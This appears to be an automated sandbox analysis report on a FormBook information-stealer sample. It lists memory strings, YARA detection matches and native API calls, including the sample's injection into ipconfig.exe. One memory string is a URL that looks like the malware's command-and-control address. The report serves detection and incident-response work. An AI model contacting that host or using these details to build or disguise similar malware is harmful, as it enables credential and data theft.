          Source: explorer.exe, 00000005.00000000.360323834.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 00000005.00000000.360323834.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 00000005.00000000.360323834.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 00000005.00000000.360323834.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 00000005.00000000.360323834.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000005.00000000.360323834.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 00000005.00000000.360323834.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 00000005.00000000.360323834.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 00000005.00000000.360323834.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000005.00000000.360323834.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 00000005.00000000.360323834.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 00000005.00000000.360323834.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000005.00000000.360323834.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: ipconfig.exe, 00000007.00000002.601572909.0000000003C42000.00000004.00000001.sdmpString found in binary or memory: http://www.scuolatua.com:80/dy8g/?i0GDM=DyFQJ285GCHWDKdZkYvFextRb5KpVMjfJilCoJQfsM3
          Source: explorer.exe, 00000005.00000000.360323834.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 00000005.00000000.360323834.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000005.00000000.360323834.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000005.00000000.360323834.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 0.2.v8kZUFgdD4.exe.21d0000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.v8kZUFgdD4.exe.21d0000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.v8kZUFgdD4.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.v8kZUFgdD4.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.v8kZUFgdD4.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000007.00000002.599150521.0000000001330000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.389518635.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.597969689.0000000000EA0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.341137782.00000000021D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.389832598.00000000009F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.598432080.0000000001100000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.389732615.00000000005B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000001.339035509.0000000000400000.00000040.00020000.sdmp, type: MEMORY

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 0.2.v8kZUFgdD4.exe.21d0000.2.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.v8kZUFgdD4.exe.21d0000.2.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.v8kZUFgdD4.exe.21d0000.2.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.v8kZUFgdD4.exe.21d0000.2.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.v8kZUFgdD4.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.v8kZUFgdD4.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.v8kZUFgdD4.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.v8kZUFgdD4.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.599150521.0000000001330000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.599150521.0000000001330000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.389518635.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.389518635.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.597969689.0000000000EA0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.597969689.0000000000EA0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.341137782.00000000021D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.341137782.00000000021D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.389832598.00000000009F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.389832598.00000000009F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.598432080.0000000001100000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.598432080.0000000001100000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.389732615.00000000005B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.389732615.00000000005B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000001.339035509.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000001.339035509.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_004181D0 NtCreateFile,1_2_004181D0
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00418280 NtReadFile,1_2_00418280
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00418300 NtClose,1_2_00418300
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_004183B0 NtAllocateVirtualMemory,1_2_004183B0
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00418222 NtCreateFile,1_2_00418222
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_004183AA NtAllocateVirtualMemory,1_2_004183AA
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00A998F0 NtReadVirtualMemory,LdrInitializeThunk,1_2_00A998F0
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00A99860 NtQuerySystemInformation,LdrInitializeThunk,1_2_00A99860
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00A99840 NtDelayExecution,LdrInitializeThunk,1_2_00A99840
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00A999A0 NtCreateSection,LdrInitializeThunk,1_2_00A999A0
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00A99910 NtAdjustPrivilegesToken,LdrInitializeThunk,1_2_00A99910
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00A99A20 NtResumeThread,LdrInitializeThunk,1_2_00A99A20
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00A99A00 NtProtectVirtualMemory,LdrInitializeThunk,1_2_00A99A00
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00A99A50 NtCreateFile,LdrInitializeThunk,1_2_00A99A50
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00A995D0 NtClose,LdrInitializeThunk,1_2_00A995D0
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00A99540 NtReadFile,LdrInitializeThunk,1_2_00A99540
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00A996E0 NtFreeVirtualMemory,LdrInitializeThunk,1_2_00A996E0
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00A99660 NtAllocateVirtualMemory,LdrInitializeThunk,1_2_00A99660
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00A997A0 NtUnmapViewOfSection,LdrInitializeThunk,1_2_00A997A0
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00A99780 NtMapViewOfSection,LdrInitializeThunk,1_2_00A99780
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00A99FE0 NtCreateMutant,LdrInitializeThunk,1_2_00A99FE0
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00A99710 NtQueryInformationToken,LdrInitializeThunk,1_2_00A99710
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00A998A0 NtWriteVirtualMemory,1_2_00A998A0
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00A99820 NtEnumerateKey,1_2_00A99820
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00A9B040 NtSuspendThread,1_2_00A9B040
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00A999D0 NtCreateProcessEx,1_2_00A999D0
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00A99950 NtQueueApcThread,1_2_00A99950
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00A99A80 NtOpenDirectoryObject,1_2_00A99A80
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00A99A10 NtQuerySection,1_2_00A99A10
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035F9710 NtQueryInformationToken,LdrInitializeThunk,7_2_035F9710
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035F9FE0 NtCreateMutant,LdrInitializeThunk,7_2_035F9FE0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035F9780 NtMapViewOfSection,LdrInitializeThunk,7_2_035F9780
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035F9A50 NtCreateFile,LdrInitializeThunk,7_2_035F9A50
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035F96D0 NtCreateKey,LdrInitializeThunk,7_2_035F96D0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035F96E0 NtFreeVirtualMemory,LdrInitializeThunk,7_2_035F96E0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035F9540 NtReadFile,LdrInitializeThunk,7_2_035F9540
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035F9910 NtAdjustPrivilegesToken,LdrInitializeThunk,7_2_035F9910
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035F95D0 NtClose,LdrInitializeThunk,7_2_035F95D0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035F99A0 NtCreateSection,LdrInitializeThunk,7_2_035F99A0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035F9840 NtDelayExecution,LdrInitializeThunk,7_2_035F9840
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035F9860 NtQuerySystemInformation,LdrInitializeThunk,7_2_035F9860
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035F9770 NtSetInformationFile,7_2_035F9770
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035FA770 NtOpenThread,7_2_035FA770
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035F9760 NtOpenProcess,7_2_035F9760
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035FA710 NtOpenProcessToken,7_2_035FA710
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035F9B00 NtSetValueKey,7_2_035F9B00
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035F9730 NtQueryVirtualMemory,7_2_035F9730
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035FA3B0 NtGetContextThread,7_2_035FA3B0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035F97A0 NtUnmapViewOfSection,7_2_035F97A0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035F9650 NtQueryValueKey,7_2_035F9650
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035F9670 NtQueryInformationProcess,7_2_035F9670
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035F9660 NtAllocateVirtualMemory,7_2_035F9660
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035F9610 NtEnumerateValueKey,7_2_035F9610
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035F9A10 NtQuerySection,7_2_035F9A10
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035F9A00 NtProtectVirtualMemory,7_2_035F9A00
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035F9A20 NtResumeThread,7_2_035F9A20
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035F9A80 NtOpenDirectoryObject,7_2_035F9A80
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035F9950 NtQueueApcThread,7_2_035F9950
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035F9560 NtWriteFile,7_2_035F9560
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035FAD30 NtSetContextThread,7_2_035FAD30
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035F9520 NtWaitForSingleObject,7_2_035F9520
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035F99D0 NtCreateProcessEx,7_2_035F99D0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035F95F0 NtQueryInformationFile,7_2_035F95F0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035FB040 NtSuspendThread,7_2_035FB040
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035F9820 NtEnumerateKey,7_2_035F9820
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035F98F0 NtReadVirtualMemory,7_2_035F98F0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035F98A0 NtWriteVirtualMemory,7_2_035F98A0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_00EB81D0 NtCreateFile,7_2_00EB81D0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_00EB8280 NtReadFile,7_2_00EB8280
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_00EB8300 NtClose,7_2_00EB8300
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_00EB8222 NtCreateFile,7_2_00EB8222
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_0040102E1_2_0040102E
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_004010301_2_00401030
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_0041B8FB1_2_0041B8FB
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00408C6C1_2_00408C6C
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00408C701_2_00408C70
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_0041B57A1_2_0041B57A
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00402D881_2_00402D88
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_0041C58A1_2_0041C58A
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00402D901_2_00402D90
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00402FB01_2_00402FB0
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00A820A01_2_00A820A0
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00B220A81_2_00B220A8
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00A6B0901_2_00A6B090
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00B110021_2_00B11002
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00A741201_2_00A74120
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00A5F9001_2_00A5F900
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035EEBB07_2_035EEBB0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035D6E307_2_035D6E30
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_03681D557_2_03681D55
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035BF9007_2_035BF900
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035B0D207_2_035B0D20
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035D41207_2_035D4120
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035CD5E07_2_035CD5E0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035E25817_2_035E2581
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035C841F7_2_035C841F
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_036710027_2_03671002
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035CB0907_2_035CB090
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035E20A07_2_035E20A0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_00EBB8FB7_2_00EBB8FB
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_00EA8C6C7_2_00EA8C6C
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_00EA8C707_2_00EA8C70
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_00EBC58A7_2_00EBC58A
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_00EA2D887_2_00EA2D88
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_00EA2D907_2_00EA2D90
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_00EBB57A7_2_00EBB57A
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_00EA2FB07_2_00EA2FB0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: String function: 035BB150 appears 35 times
          Source: v8kZUFgdD4.exe, 00000000.00000003.333171421.0000000002486000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs v8kZUFgdD4.exe
          Source: v8kZUFgdD4.exe, 00000001.00000002.389800702.000000000060E000.00000004.00000020.sdmpBinary or memory string: OriginalFilenameipconfig.exej% vs v8kZUFgdD4.exe
          Source: v8kZUFgdD4.exe, 00000001.00000002.390529849.0000000000CDF000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs v8kZUFgdD4.exe
          Source: v8kZUFgdD4.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
          Source: 0.2.v8kZUFgdD4.exe.21d0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.v8kZUFgdD4.exe.21d0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.v8kZUFgdD4.exe.21d0000.2.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.v8kZUFgdD4.exe.21d0000.2.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.v8kZUFgdD4.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.v8kZUFgdD4.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.v8kZUFgdD4.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.v8kZUFgdD4.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.599150521.0000000001330000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.599150521.0000000001330000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.389518635.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.389518635.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.597969689.0000000000EA0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.597969689.0000000000EA0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.341137782.00000000021D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.341137782.00000000021D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.389832598.00000000009F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.389832598.00000000009F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.598432080.0000000001100000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.598432080.0000000001100000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.389732615.00000000005B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.389732615.00000000005B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
